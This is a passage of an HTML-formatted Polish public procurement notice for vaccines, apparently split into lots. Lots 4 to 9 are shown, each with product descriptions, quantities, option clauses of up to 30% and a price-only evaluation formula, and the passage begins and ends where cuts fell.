class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Szczepionka przeciwko błonicy (D), tężcowi (T) i krztuścowi (komponenta bezkomórkowa, Pa ), zawierająca 3 antygeny<br/>krztuśca, poliomyelitis ( inaktywowana) / IPV , haemophilus influenzę typ B ( skoniugowana/HIB/), adsorbowana, wzw typu<br/>B ( rDNA) / HBV,; górna granica stosowania 36 miesiąc życia. Liczba zamawianych sztuk na okres zamówienia: 200 szt </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33651600-4 - Szczepionki</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 15) Zgodnie z art. 441 pzp Zamawiający przewiduje możliwość zlecenia Wykonawcy dodatkowego zakresu rzeczowego<br/>(„Opcja”) dla każdej części, w przypadku, gdy w okresie trwania umowy wyczerpaniu ulegnie zakres podstawowy a zakup<br/>dodatkowej ilości szczepionek będzie leżał w interesie Zamawiającego oraz wynikał z jego bieżących potrzeb.<br/>16) Asortyment będący przedmiotem Opcji może zostać zamówiony w ilości stanowiącej równowartość do 30% wartości<br/>zamówienia podstawowego (dla każdej części), określonej w umowie zawartej z Wykonawcą. Podstawą określenia wartości<br/>zamówienia w ramach Opcji (w celu określenia jej zakresu) będą ceny jednostkowe poszczególnych asortymentów zawarte<br/>w ofercie Wykonawcy.<br/>17) W celu uruchomienia prawa opcji Zamawiający złoży Wykonawcy pisemne oświadczenie woli w przedmiocie<br/>skorzystania z prawa opcji w określonym zakresie. Oświadczenie będzie zawierało potwierdzenie środków finansowych na<br/>zrealizowanie zamówienia i będzie stanowiło załącznik do umowy.<br/>18) Prawo opcji jest jednostronnym uprawnieniem Zamawiającego, z którego może, ale nie ma obowiązku skorzystać w<br/>ramach realizacji przedmiotu zamówienia. W przypadku nie skorzystania przez Zamawiającego z prawa opcji Wykonawcy<br/>nie przysługują żadne roszczenia z tego tytułu.<br/>19) Jeżeli Zamawiający skorzysta z prawa opcji obowiązkiem umownym wykonawcy jest wykonanie świadczenia w zakresie<br/>objętym wykorzystanym prawem opcji na warunkach takich jak zamówienie podstawowe<br/>20) Zamawiający ma prawo wielokrotnie korzystać z prawa opcji po zrealizowaniu zakresu podstawowego zamówienia –<br/>jednak do wyczerpania maksymalnego zakresu prawa opcji.<br/>21) Uruchomienie opcji nie będzie wymagało zmiany umowy. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">24 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">16. Opis kryteriów oceny ofert, wraz z podaniem wag tych kryteriów i sposobu oceny ofert:<br/>1. Zamawiający przy wyborze najkorzystniejszej oferty będzie kierować się kryterium oceny ofert: Cena – 100%;<br/>2. Ocena ofert zostanie dokonana w następujący sposób:<br/>Kryterium ceny rozpatrywane będzie na podstawie ceny brutto podanej przez Wykonawcę. Wykonawca, który przedstawi najniższą<br/>cenę w ofercie otrzyma max 100 pkt., a inni odpowiednio mniej, stosownie do przedstawionego poniżej wzoru:<br/>C = (Cmin : Cx) x 100<br/>gdzie:<br/>C – liczba punktów przyznanych danej ofercie,<br/>Przyznane punkty zostaną zaokrąglone do dwóch miejsc po przecinku.<br/>Cmin – najniższa cena brutto zaoferowana w przetargu,<br/>Cx– cena brutto podana przez Wykonawcę, dla którego wynik jest obliczany.<br/>Jeżeli nie można wybrać oferty najkorzystniejszej z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny i innych<br/>kryteriów oceny ofert, Zamawiający spośród tych ofert wybiera ofertę z niższą ceną lub najniższym kosztem, a jeżeli zostały złożone<br/>oferty o takiej samej cenie lub koszcie, zamawiający wzywa wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym<br/>przez zamawiającego ofert dodatkowych.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Szczepionka przeciw meningokokom grupy B (rDNA), złożona, adsorbowana; stosowana do czynnego uodparniania osób w<br/>wieku 2 miesięcy i starszych przeciw inwazyjnej chorobie meningokokowej wywołanej przez Neisseria meningitidis grupy B zawiesina do wstrzykiwań w ampułkostrzykawce.<br/>Liczba zamawianych sztuk na okres zamówienia: 250 szt. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33651600-4 - Szczepionki</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 15) Zgodnie z art. 441 pzp Zamawiający przewiduje możliwość zlecenia Wykonawcy dodatkowego zakresu rzeczowego<br/>(„Opcja”) dla każdej części, w przypadku, gdy w okresie trwania umowy wyczerpaniu ulegnie zakres podstawowy a zakup<br/>dodatkowej ilości szczepionek będzie leżał w interesie Zamawiającego oraz wynikał z jego bieżących potrzeb.<br/>16) Asortyment będący przedmiotem Opcji może zostać zamówiony w ilości stanowiącej równowartość do 30% wartości<br/>zamówienia podstawowego (dla każdej części), określonej w umowie zawartej z Wykonawcą. Podstawą określenia wartości<br/>zamówienia w ramach Opcji (w celu określenia jej zakresu) będą ceny jednostkowe poszczególnych asortymentów zawarte<br/>w ofercie Wykonawcy.<br/>17) W celu uruchomienia prawa opcji Zamawiający złoży Wykonawcy pisemne oświadczenie woli w przedmiocie<br/>skorzystania z prawa opcji w określonym zakresie. Oświadczenie będzie zawierało potwierdzenie środków finansowych na<br/>zrealizowanie zamówienia i będzie stanowiło załącznik do umowy.<br/>18) Prawo opcji jest jednostronnym uprawnieniem Zamawiającego, z którego może, ale nie ma obowiązku skorzystać w<br/>ramach realizacji przedmiotu zamówienia. W przypadku nie skorzystania przez Zamawiającego z prawa opcji Wykonawcy<br/>nie przysługują żadne roszczenia z tego tytułu.<br/>19) Jeżeli Zamawiający skorzysta z prawa opcji obowiązkiem umownym wykonawcy jest wykonanie świadczenia w zakresie<br/>objętym wykorzystanym prawem opcji na warunkach takich jak zamówienie podstawowe<br/>20) Zamawiający ma prawo wielokrotnie korzystać z prawa opcji po zrealizowaniu zakresu podstawowego zamówienia –<br/>jednak do wyczerpania maksymalnego zakresu prawa opcji.<br/>21) Uruchomienie opcji nie będzie wymagało zmiany umowy. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">24 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">16. Opis kryteriów oceny ofert, wraz z podaniem wag tych kryteriów i sposobu oceny ofert:<br/>1. Zamawiający przy wyborze najkorzystniejszej oferty będzie kierować się kryterium oceny ofert: Cena – 100%;<br/>2. Ocena ofert zostanie dokonana w następujący sposób:<br/>Kryterium ceny rozpatrywane będzie na podstawie ceny brutto podanej przez Wykonawcę. Wykonawca, który przedstawi najniższą<br/>cenę w ofercie otrzyma max 100 pkt., a inni odpowiednio mniej, stosownie do przedstawionego poniżej wzoru:<br/>C = (Cmin : Cx) x 100<br/>gdzie:<br/>C – liczba punktów przyznanych danej ofercie,<br/>Przyznane punkty zostaną zaokrąglone do dwóch miejsc po przecinku.<br/>Cmin – najniższa cena brutto zaoferowana w przetargu,<br/>Cx– cena brutto podana przez Wykonawcę, dla którego wynik jest obliczany.<br/>Jeżeli nie można wybrać oferty najkorzystniejszej z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny i innych<br/>kryteriów oceny ofert, Zamawiający spośród tych ofert wybiera ofertę z niższą ceną lub najniższym kosztem, a jeżeli zostały złożone<br/>oferty o takiej samej cenie lub koszcie, zamawiający wzywa wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym<br/>przez zamawiającego ofert dodatkowych.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 6</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Czterowalentna szczepionka przeciw grypie typu split (rozszczepiony wirion) inaktywowana. Wskazana do stosowania u<br/>osób od ukończenia 6 miesiąca życia. Opakowanie zbiorcze – 10 ampułkostrzykawek po 0,5 ml z igłą ( dwa blistry po 5<br/>ampułkostrzykawek) lub opakowanie pojedyncze 1 ampułkostrzykawka po 0,5 ml z dołączoną igłą w tekturowym pudełku. Liczba zamawianych sztuk na okres zamówienia: 400 szt. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33651600-4 - Szczepionki</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 15) Zgodnie z art. 441 pzp Zamawiający przewiduje możliwość zlecenia Wykonawcy dodatkowego zakresu rzeczowego<br/>(„Opcja”) dla każdej części, w przypadku, gdy w okresie trwania umowy wyczerpaniu ulegnie zakres podstawowy a zakup<br/>dodatkowej ilości szczepionek będzie leżał w interesie Zamawiającego oraz wynikał z jego bieżących potrzeb.<br/>16) Asortyment będący przedmiotem Opcji może zostać zamówiony w ilości stanowiącej równowartość do 30% wartości<br/>zamówienia podstawowego (dla każdej części), określonej w umowie zawartej z Wykonawcą. Podstawą określenia wartości<br/>zamówienia w ramach Opcji (w celu określenia jej zakresu) będą ceny jednostkowe poszczególnych asortymentów zawarte<br/>w ofercie Wykonawcy.<br/>17) W celu uruchomienia prawa opcji Zamawiający złoży Wykonawcy pisemne oświadczenie woli w przedmiocie<br/>skorzystania z prawa opcji w określonym zakresie. Oświadczenie będzie zawierało potwierdzenie środków finansowych na<br/>zrealizowanie zamówienia i będzie stanowiło załącznik do umowy.<br/>18) Prawo opcji jest jednostronnym uprawnieniem Zamawiającego, z którego może, ale nie ma obowiązku skorzystać w<br/>ramach realizacji przedmiotu zamówienia. W przypadku nie skorzystania przez Zamawiającego z prawa opcji Wykonawcy<br/>nie przysługują żadne roszczenia z tego tytułu.<br/>19) Jeżeli Zamawiający skorzysta z prawa opcji obowiązkiem umownym wykonawcy jest wykonanie świadczenia w zakresie<br/>objętym wykorzystanym prawem opcji na warunkach takich jak zamówienie podstawowe<br/>20) Zamawiający ma prawo wielokrotnie korzystać z prawa opcji po zrealizowaniu zakresu podstawowego zamówienia –<br/>jednak do wyczerpania maksymalnego zakresu prawa opcji.<br/>21) Uruchomienie opcji nie będzie wymagało zmiany umowy. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">24 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">16. Opis kryteriów oceny ofert, wraz z podaniem wag tych kryteriów i sposobu oceny ofert:<br/>1. Zamawiający przy wyborze najkorzystniejszej oferty będzie kierować się kryterium oceny ofert: Cena – 100%;<br/>2. Ocena ofert zostanie dokonana w następujący sposób:<br/>Kryterium ceny rozpatrywane będzie na podstawie ceny brutto podanej przez Wykonawcę. Wykonawca, który przedstawi najniższą<br/>cenę w ofercie otrzyma max 100 pkt., a inni odpowiednio mniej, stosownie do przedstawionego poniżej wzoru:<br/>C = (Cmin : Cx) x 100<br/>gdzie:<br/>C – liczba punktów przyznanych danej ofercie,<br/>Przyznane punkty zostaną zaokrąglone do dwóch miejsc po przecinku.<br/>Cmin – najniższa cena brutto zaoferowana w przetargu,<br/>Cx– cena brutto podana przez Wykonawcę, dla którego wynik jest obliczany.<br/>Jeżeli nie można wybrać oferty najkorzystniejszej z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny i innych<br/>kryteriów oceny ofert, Zamawiający spośród tych ofert wybiera ofertę z niższą ceną lub najniższym kosztem, a jeżeli zostały złożone<br/>oferty o takiej samej cenie lub koszcie, zamawiający wzywa wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym<br/>przez zamawiającego ofert dodatkowych.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 7</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Szczepionka przeciw błonicy, tężcowi, krztuścowi (bezkomórkowa, złożona, zawierająca dwa antygeny krztuśca- toksoid<br/>krztuścowy i hemaglutyninę włókienkową), wirusowemu zapaleniu wątroby typu B (rDNA ), poliomyelitis (inaktywowana) i<br/>haemophilus typ b ( skoniugowana) adsorbowana. 0,5 ml zawiesiny w ampułkostrzykawce z 2 osobnymi igłami – pudełko po<br/>1 sztuce. Liczba zamawianych sztuk na okres zamówienia: 60 szt. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33651600-4 - Szczepionki</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 15) Zgodnie z art. 441 pzp Zamawiający przewiduje możliwość zlecenia Wykonawcy dodatkowego zakresu rzeczowego<br/>(„Opcja”) dla każdej części, w przypadku, gdy w okresie trwania umowy wyczerpaniu ulegnie zakres podstawowy a zakup<br/>dodatkowej ilości szczepionek będzie leżał w interesie Zamawiającego oraz wynikał z jego bieżących potrzeb.<br/>16) Asortyment będący przedmiotem Opcji może zostać zamówiony w ilości stanowiącej równowartość do 30% wartości<br/>zamówienia podstawowego (dla każdej części), określonej w umowie zawartej z Wykonawcą. Podstawą określenia wartości<br/>zamówienia w ramach Opcji (w celu określenia jej zakresu) będą ceny jednostkowe poszczególnych asortymentów zawarte<br/>w ofercie Wykonawcy.<br/>17) W celu uruchomienia prawa opcji Zamawiający złoży Wykonawcy pisemne oświadczenie woli w przedmiocie<br/>skorzystania z prawa opcji w określonym zakresie. Oświadczenie będzie zawierało potwierdzenie środków finansowych na<br/>zrealizowanie zamówienia i będzie stanowiło załącznik do umowy.<br/>18) Prawo opcji jest jednostronnym uprawnieniem Zamawiającego, z którego może, ale nie ma obowiązku skorzystać w<br/>ramach realizacji przedmiotu zamówienia. W przypadku nie skorzystania przez Zamawiającego z prawa opcji Wykonawcy<br/>nie przysługują żadne roszczenia z tego tytułu.<br/>19) Jeżeli Zamawiający skorzysta z prawa opcji obowiązkiem umownym wykonawcy jest wykonanie świadczenia w zakresie<br/>objętym wykorzystanym prawem opcji na warunkach takich jak zamówienie podstawowe<br/>20) Zamawiający ma prawo wielokrotnie korzystać z prawa opcji po zrealizowaniu zakresu podstawowego zamówienia –<br/>jednak do wyczerpania maksymalnego zakresu prawa opcji.<br/>21) Uruchomienie opcji nie będzie wymagało zmiany umowy. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">24 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">16. Opis kryteriów oceny ofert, wraz z podaniem wag tych kryteriów i sposobu oceny ofert:<br/>1. Zamawiający przy wyborze najkorzystniejszej oferty będzie kierować się kryterium oceny ofert: Cena – 100%;<br/>2. Ocena ofert zostanie dokonana w następujący sposób:<br/>Kryterium ceny rozpatrywane będzie na podstawie ceny brutto podanej przez Wykonawcę. Wykonawca, który przedstawi najniższą<br/>cenę w ofercie otrzyma max 100 pkt., a inni odpowiednio mniej, stosownie do przedstawionego poniżej wzoru:<br/>C = (Cmin : Cx) x 100<br/>gdzie:<br/>C – liczba punktów przyznanych danej ofercie,<br/>Przyznane punkty zostaną zaokrąglone do dwóch miejsc po przecinku.<br/>Cmin – najniższa cena brutto zaoferowana w przetargu,<br/>Cx– cena brutto podana przez Wykonawcę, dla którego wynik jest obliczany.<br/>Jeżeli nie można wybrać oferty najkorzystniejszej z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny i innych<br/>kryteriów oceny ofert, Zamawiający spośród tych ofert wybiera ofertę z niższą ceną lub najniższym kosztem, a jeżeli zostały złożone<br/>oferty o takiej samej cenie lub koszcie, zamawiający wzywa wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym<br/>przez zamawiającego ofert dodatkowych.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 8</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Szczepionka przeciw błonicy, tężcowi, krztuścowi (bezkomórkowa, złożona, zawierająca dwa antygeny krztuśca – toksoid<br/>krztuścowy i hemaglutyninę włókienkową), poliomyelitis (inaktywowana) i haemophilus typ b (skoniugowana),<br/>adsorbowana.Fiolka z proszkiem + ampułko strzykawka z zawiesiną po 0,5 ml z dwoma osobnymi igłami – pudełko po 1 szt.<br/>Liczba sztuk zamawianych na okres zamówienia - 50 szt. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33651600-4 - Szczepionki</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 15) Zgodnie z art. 441 pzp Zamawiający przewiduje możliwość zlecenia Wykonawcy dodatkowego zakresu rzeczowego<br/>(„Opcja”) dla każdej części, w przypadku, gdy w okresie trwania umowy wyczerpaniu ulegnie zakres podstawowy a zakup<br/>dodatkowej ilości szczepionek będzie leżał w interesie Zamawiającego oraz wynikał z jego bieżących potrzeb.<br/>16) Asortyment będący przedmiotem Opcji może zostać zamówiony w ilości stanowiącej równowartość do 30% wartości<br/>zamówienia podstawowego (dla każdej części), określonej w umowie zawartej z Wykonawcą. Podstawą określenia wartości<br/>zamówienia w ramach Opcji (w celu określenia jej zakresu) będą ceny jednostkowe poszczególnych asortymentów zawarte<br/>w ofercie Wykonawcy.<br/>17) W celu uruchomienia prawa opcji Zamawiający złoży Wykonawcy pisemne oświadczenie woli w przedmiocie<br/>skorzystania z prawa opcji w określonym zakresie. Oświadczenie będzie zawierało potwierdzenie środków finansowych na<br/>zrealizowanie zamówienia i będzie stanowiło załącznik do umowy.<br/>18) Prawo opcji jest jednostronnym uprawnieniem Zamawiającego, z którego może, ale nie ma obowiązku skorzystać w<br/>ramach realizacji przedmiotu zamówienia. W przypadku nie skorzystania przez Zamawiającego z prawa opcji Wykonawcy<br/>nie przysługują żadne roszczenia z tego tytułu.<br/>19) Jeżeli Zamawiający skorzysta z prawa opcji obowiązkiem umownym wykonawcy jest wykonanie świadczenia w zakresie<br/>objętym wykorzystanym prawem opcji na warunkach takich jak zamówienie podstawowe<br/>20) Zamawiający ma prawo wielokrotnie korzystać z prawa opcji po zrealizowaniu zakresu podstawowego zamówienia –<br/>jednak do wyczerpania maksymalnego zakresu prawa opcji.<br/>21) Uruchomienie opcji nie będzie wymagało zmiany umowy. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">24 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">16. Opis kryteriów oceny ofert, wraz z podaniem wag tych kryteriów i sposobu oceny ofert:<br/>1. Zamawiający przy wyborze najkorzystniejszej oferty będzie kierować się kryterium oceny ofert: Cena – 100%;<br/>2. Ocena ofert zostanie dokonana w następujący sposób:<br/>Kryterium ceny rozpatrywane będzie na podstawie ceny brutto podanej przez Wykonawcę. Wykonawca, który przedstawi najniższą<br/>cenę w ofercie otrzyma max 100 pkt., a inni odpowiednio mniej, stosownie do przedstawionego poniżej wzoru:<br/>C = (Cmin : Cx) x 100<br/>gdzie:<br/>C – liczba punktów przyznanych danej ofercie,<br/>Przyznane punkty zostaną zaokrąglone do dwóch miejsc po przecinku.<br/>Cmin – najniższa cena brutto zaoferowana w przetargu,<br/>Cx– cena brutto podana przez Wykonawcę, dla którego wynik jest obliczany.<br/>Jeżeli nie można wybrać oferty najkorzystniejszej z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny i innych<br/>kryteriów oceny ofert, Zamawiający spośród tych ofert wybiera ofertę z niższą ceną lub najniższym kosztem, a jeżeli zostały złożone<br/>oferty o takiej samej cenie lub koszcie, zamawiający wzywa wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym<br/>przez zamawiającego ofert dodatkowych.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 9</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Szczepionka przeciw pneumokokom polisacharydowa, skoniugowana (trzynasto- walentna, adsorbowana ). Liczba sztuk<br/>zamawianych na okres zamówienia: 250 szt. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33651600-4 - Szczepionki</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 15) Zgodnie z art. 441 pzp Zamawiający przewiduje możliwość zlecenia Wykonawcy dodatkowego zakresu rzeczowego<br/>(„Opcja”) dla każdej części, w przypadku, gdy w okresie trwania umowy wyczerpaniu ulegnie zakres podstawowy a zakup<br/>dodatkowej ilości szczepionek będzie leżał w interesie Zamawiającego oraz wynikał z jego bieżących potrzeb.<br/>16) Asortyment będący przedmiotem Opcji może zostać zamówiony w ilości stanowiącej równowartość do 30% wartości<br/>zamówienia podstawowego (dla każdej części), określonej w umowie zawartej z Wykonawcą. Podstawą określenia wartości<br/>zamówienia w ramach Opcji (w celu określenia jej zakresu) będą ceny jednostkowe poszczególnych asortymentów zawarte<br/>w ofercie Wykonawcy.<br/>17) W celu uruchomienia prawa opcji Zamawiający złoży Wykonawcy pisemne oświadczenie woli w przedmiocie<br/>skorzystania z prawa opcji w określonym zakresie. Oświadczenie będzie zawierało potwierdzenie środków finansowych na<br/>zrealizowanie zamówienia i będzie stanowiło załącznik do umowy.<br/>18) Prawo opcji jest jednostronnym uprawnieniem Zamawiającego, z którego może, ale nie ma obowiązku skorzystać w<br/>ramach realizacji przedmiotu zamówienia. W przypadku nie skorzystania przez Zamawiającego z prawa opcji Wykonawcy<br/>nie przysługują żadne roszczenia z tego tytułu.<br/>19) Jeżeli Zamawiający skorzysta z prawa opcji obowiązkiem umownym wykonawcy jest wykonanie świadczenia w zakresie<br/>objętym wykorzystanym prawem opcji na warunkach takich jak zamówienie podstawowe<br/>20) Zamawiający ma prawo wielokrotnie korzystać z prawa opcji po zrealizowaniu zakresu podstawowego zamówienia –<br/>jednak do wyczerpania maksymalnego zakresu prawa opcji.<br/>21) Uruchomienie opcji nie będzie wymagało zmiany umowy. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">24 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">16. Opis kryteriów oceny ofert, wraz z podaniem wag tych kryteriów i sposobu oceny ofert:<br/>1. Zamawiający przy wyborze najkorzystniejszej oferty będzie kierować się kryterium oceny ofert: Cena – 100%;<br/>2. Ocena ofert zostanie dokonana w następujący sposób:<br/>Kryterium ceny rozpatrywane będzie na podstawie ceny brutto podanej przez Wykonawcę. Wykonawca, który przedstawi najniższą<br/>cenę w ofercie otrzyma max 100 pkt., a inni odpowiednio mniej, stosownie do przedstawionego poniżej wzoru:<br/>C = (Cmin : Cx) x 100<br/>gdzie:<br/>C – liczba punktów przyznanych danej ofercie,<br/>Przyznane punkty zostaną zaokrąglone do dwóch miejsc po przecinku.<br/>Cmin – najniższa cena brutto zaoferowana w przetargu,<br/>Cx– cena brutto podana przez Wykonawcę, dla którego wynik jest obliczany.<br/>Jeżeli nie można wybrać oferty najkorzystniejszej z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny i innych<br/>kryteriów oceny ofert, Zamawiający 